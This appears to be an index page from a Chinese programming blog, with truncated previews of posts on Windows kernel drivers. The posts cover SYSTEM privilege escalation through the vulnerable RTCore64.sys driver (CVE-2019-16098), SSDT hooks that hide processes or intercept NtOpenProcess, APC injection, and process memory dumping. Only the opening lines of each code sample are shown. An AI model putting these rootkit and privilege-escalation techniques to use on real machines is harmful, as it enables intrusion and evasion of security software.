Theqiqi_blog

使用驱动漏洞提权 安装漏洞驱动RTCore64.sys 漏洞编号:CVE-2019-16098 编写C语言代码提权到system 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139#include <Windows.h>#include <cstdio>#include <Psapi.h>#define SymLinkName L"\\\\.\\RTCore64"stru ...

调用未导出的函数NtCreateUserProcess创建进程123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118#include <ntifs.h>#include <wdm.h>#include <ntstrsafe.h>#include <minwindef.h>#define Log(X) DbgPrint("qi:"X##)// 手动声明必要的未公开结构typedef struct _RTL_USER_PROCESS_PARAMETERS { BYTE Rese ...

1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253#include <ntddk.h>#include <wdf.h>DRIVER_INITIALIZE DriverEntry;EVT_WDF_DRIVER_UNLOAD MyEvtDriverUnload; // 卸载函数（KMDF 风格）EVT_WDF_DRIVER_DEVICE_ADD MyEvtDeviceAdd; // 必须定义，但可以不创建设备// 驱动卸载回调VOID MyEvtDriverUnload(_In_ WDFDRIVER Driver){ UNREFERENCED_PARAMETER(Driver); KdPrint(("qi: KMDF Driver Unload!\n"));}// 添加设备回调（必须提供，即使什么都不做）NTSTATUS MyEvtDeviceAdd( _In_ W ...

C++编写驱动程序1234567891011121314151617181920#include <ntddk.h>// 宏定义改为 C++ 风格#define Log(x) DbgPrint("qi:" x)// DriverUnload 必须使用 extern "C"extern "C"void UnloadDriver(PDRIVER_OBJECT DriverObject){ Log("Unloaded Successfully!\n");}// DriverEntry 也必须使用 extern "C"extern "C"NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath){ DriverObject->DriverUnload = UnloadDriver; Log("Loade ...

用户模式下dump进程内存dump完整进程内存12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667#include <windows.h>#include <dbghelp.h>#include <stdio.h>#pragma comment(lib, "dbghelp.lib")BOOL CreateMiniDump(DWORD dwPID, const char* szDumpFilePath){ HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID); if (hProcess == NULL) { printf("无法打开进程 %d，错误码：%d\n", dwPID, GetLastE ...

隐藏进程,通过Hook SSDT表中的NtQuerySystemInformation函数隐藏进程信息123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162#include <ntifs.h>#include "C:\D\test\CC++\cc++lib\driver\de ...

Hook SSDT表中的NtOpenProcess函数123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120#include <ntifs.h>#include "C:\D\test\CC++\cc++lib\driver\def.h"VOID GetSSDT0(PVOID* addr);BOOLEAN HookSSDT_On(PVOID newfunc, PVOID hkfunc, PVOID* oldbase, PULONG oldoffset);VOID HookSSDT_Off(PVOID oldbase ...

遍历SSDT列表 def.h 参考之前的关于未导出结构体的文章 entry.c 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384#include "C:\D\test\CC++\cc++lib\driver\def.h"VOID TestEnumSSDT();VOID GetSSDT(PVOID* addr);NTSTATUS DriverUnload(PDRIVER_OBJECT pdriver){ DbgPrint("unload...\n"); return STATUS_SUCCESS;}static PDRIVER_OBJECT g_pdriver = NULL;NTSTATUS DriverEntry(PDRIVER_OBJECT pdrive ...

apc注入1.entry.c1234567891011121314151617181920//entry.c#include "Inject.h"BOOLEAN isdebug = TRUE;NTSTATUS DriverUnload(PDRIVER_OBJECT pdriver){ UnTestInjectAPC(); DebugMessage("unload...\n"); return STATUS_SUCCESS;}PDRIVER_OBJECT g_DriverObject = NULL;NTSTATUS DriverEntry(PDRIVER_OBJECT pdriver, PUNICODE_STRING path){ pdriver->DriverUnload = DriverUnload; DbgPrint("loading...\n"); g_DriverObject = pdriver; TestInjectAPC(); return STATUS_SUCCESS; ...

获取特定模块下的导出函数地址 NativeStructs.h NativeStructs.h需要在网上下载，或者复制前一篇文章的代码。 entry.c 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110#include <ntifs.h>#include <windef.h>#include "C:\D\test\CC++\cc++lib\driver\NativeStructs.h"#define Log(X) DbgPrint("qi:"X##)// 获取特定模块下的导出函数地址PVOID GetModuleExportAdd ...